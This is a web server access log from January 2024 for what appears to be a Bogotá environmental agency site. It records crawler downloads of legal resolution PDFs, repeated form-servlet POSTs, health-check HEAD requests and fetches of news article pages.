216.244.66.195 - - [14/Jan/2024:07:24:07 -0500] "GET /BLA/resoluciones/AUTOS%202012/2961.pdf HTTP/1.1" 200 237288
201.245.192.253 - - [14/Jan/2024:07:24:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:07:24:32 -0500] "GET /BLA/resoluciones/AUTOS%202013/0238.pdf HTTP/1.1" 200 1309347
201.245.192.253 - - [14/Jan/2024:07:24:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38117
201.245.192.253 - - [14/Jan/2024:07:24:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39318
216.244.66.195 - - [14/Jan/2024:07:24:57 -0500] "GET /BLA/resoluciones/AUTOS%202013/0321.pdf HTTP/1.1" 200 1231087
216.244.66.195 - - [14/Jan/2024:07:25:22 -0500] "GET /BLA/resoluciones/AUTOS%202013/0352.pdf HTTP/1.1" 200 1173011
201.245.192.253 - - [14/Jan/2024:07:25:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
201.245.192.253 - - [14/Jan/2024:07:25:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [14/Jan/2024:07:25:49 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [14/Jan/2024:07:26:00 -0500] "GET /BLA/resoluciones/AUTOS%202013/0379.pdf HTTP/1.1" 200 755562
201.245.192.253 - - [14/Jan/2024:07:26:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:07:26:30 -0500] "GET /BLA/resoluciones/AUTOS%202013/0861.pdf HTTP/1.1" 200 1588902
172.22.2.4 - - [14/Jan/2024:07:25:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [14/Jan/2024:07:27:02 -0500] "GET /BLA/resoluciones/AUTOS%202013/1112.pdf HTTP/1.1" 200 673456
216.244.66.195 - - [14/Jan/2024:07:27:31 -0500] "GET /BLA/resoluciones/AUTOS%202013/1217.pdf HTTP/1.1" 200 200555
172.22.2.4 - - [14/Jan/2024:07:25:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58666
201.245.192.253 - - [14/Jan/2024:07:27:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:07:27:58 -0500] "GET /BLA/resoluciones/AUTOS%202013/1336.pdf HTTP/1.1" 200 602277
201.245.192.253 - - [14/Jan/2024:07:28:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:07:28:28 -0500] "GET /BLA/resoluciones/AUTOS%202013/1359.pdf HTTP/1.1" 200 852272
201.245.192.253 - - [14/Jan/2024:07:28:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38117
216.244.66.195 - - [14/Jan/2024:07:29:07 -0500] "GET /BLA/resoluciones/AUTOS%202013/1607.pdf HTTP/1.1" 200 140193
66.249.66.13 - - [14/Jan/2024:07:29:16 -0500] "GET /Publicaciones/2023EE233230.pdf HTTP/1.1" 404 228
201.245.192.253 - - [14/Jan/2024:07:29:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39318
216.244.66.195 - - [14/Jan/2024:07:29:38 -0500] "GET /BLA/resoluciones/AUTOS%202013/1774.pdf HTTP/1.1" 200 437054
201.245.192.253 - - [14/Jan/2024:07:29:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:07:30:07 -0500] "GET /BLA/resoluciones/AUTOS%202013/1856.pdf HTTP/1.1" 200 432989
201.245.192.253 - - [14/Jan/2024:07:30:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:07:30:36 -0500] "GET /BLA/resoluciones/AUTOS%202013/2035.pdf HTTP/1.1" 200 783602
201.245.192.253 - - [14/Jan/2024:07:30:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
216.245.221.92 - - [14/Jan/2024:07:30:49 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [14/Jan/2024:07:31:06 -0500] "GET /BLA/resoluciones/AUTOS%202013/2732.pdf HTTP/1.1" 200 690699
216.244.66.195 - - [14/Jan/2024:07:31:33 -0500] "GET /BLA/resoluciones/AUTOS%202013/2795.pdf HTTP/1.1" 200 633813
201.245.192.253 - - [14/Jan/2024:07:31:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
173.252.127.4 - - [14/Jan/2024:07:32:00 -0500] "GET /decision-de-frenar-obras-en-el-zuque-es-caprichosa-y-priva-a-la-ciudadania-de-conocer-y-preservar-los-cerros-orientales-urrutia-secretaria-de-ambiente.html HTTP/1.1" 200 1018
216.244.66.195 - - [14/Jan/2024:07:32:01 -0500] "GET /BLA/resoluciones/AUTOS%202013/3014.pdf HTTP/1.1" 200 584347
173.252.127.9 - - [14/Jan/2024:07:32:03 -0500] "GET /vehiculos-de-cero-o-bajas-emisiones-para-enfrentar-el-cambio-climatico.html HTTP/1.1" 200 743
173.252.127.8 - - [14/Jan/2024:07:32:03 -0500] "GET /recuperados-en-la-terminal-el-salitre-102-peces-que-eran-movilizados-ilegalmente-desde-el-caribe-colombiano.html HTTP/1.1" 200 773
173.252.127.21 - - [14/Jan/2024:07:32:11 -0500] "GET /secretaria-de-ambiente-libero-12-animales-silvestres-en-parque-entrenubes-en-los-ultimos-tres-anos-ya-han-retornado-a-la-libertad-12-800.html HTTP/1.1" 200 914
173.252.127.17 - - [14/Jan/2024:07:32:11 -0500] "GET /fauna-silvestre-41-animales-fueron-liberados-por-la-secretaria-de-ambiente.html HTTP/1.1" 200 825
173.252.127.5 - - [14/Jan/2024:07:32:16 -0500] "GET /ruta-de-la-libertad-mas-de-400-animales-silvestres-fueron-liberados-por-la-secretaria-de-ambiente-en-el-cesar.html HTTP/1.1" 200 853
173.252.127.20 - - [14/Jan/2024:07:32:16 -0500] "GET /asi-fue-el-reverdecer-de-leandra-marulanda-mujer-resiliente-que-ahora-emprende-con-el-compostaje.html HTTP/1.1" 200 842
173.252.127.23 - - [14/Jan/2024:07:32:16 -0500] "GET /distrito-planto-mas-de-300-arboles-en-corredor-vial-de-la-aurora-en-usme-para-celebrar-el-dia-mundial-del-arbol.html HTTP/1.1" 200 1023
173.252.127.3 - - [14/Jan/2024:07:32:16 -0500] "GET /mas-de-100-arboles-fueron-plantados-en-el-humedal-de-techo.html HTTP/1.1" 200 750
173.252.127.17 - - [14/Jan/2024:07:32:20 -0500] "GET /mas-de-28-toneladas-de-residuos-se-recolectaron-en-la-primera-reciclaton-2023.html HTTP/1.1" 200 726
173.252.127.15 - - [14/Jan/2024:07:32:20 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html HTTP/1.1" 200 783
173.252.127.2 - - [14/Jan/2024:07:32:20 -0500] "GET /techos-verdes-y-jardines-verticales-medida-de-adaptacion-al-cambio-climatico.html HTTP/1.1" 200 744
173.252.127.13 - - [14/Jan/2024:07:32:20 -0500] "GET /fima-2023-secretaria-de-ambiente-presento-red-de-monitoreo-de-fauna-y-de-prediccion-climatica.html HTTP/1.1" 200 779
201.245.192.253 - - [14/Jan/2024:07:32:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
173.252.127.24 - - [14/Jan/2024:07:32:25 -0500] "GET /serrania-el-zuque-de-cantera-en-los-anos-60-a-espacio-de-restauracion-ambiental-y-mitigacion-del-riesgo.html HTTP/1.1" 200 841
216.244.66.195 - - [14/Jan/2024:07:32:26 -0500] "GET /BLA/resoluciones/AUTOS%202022/3699.pdf HTTP/1.1" 200 377959
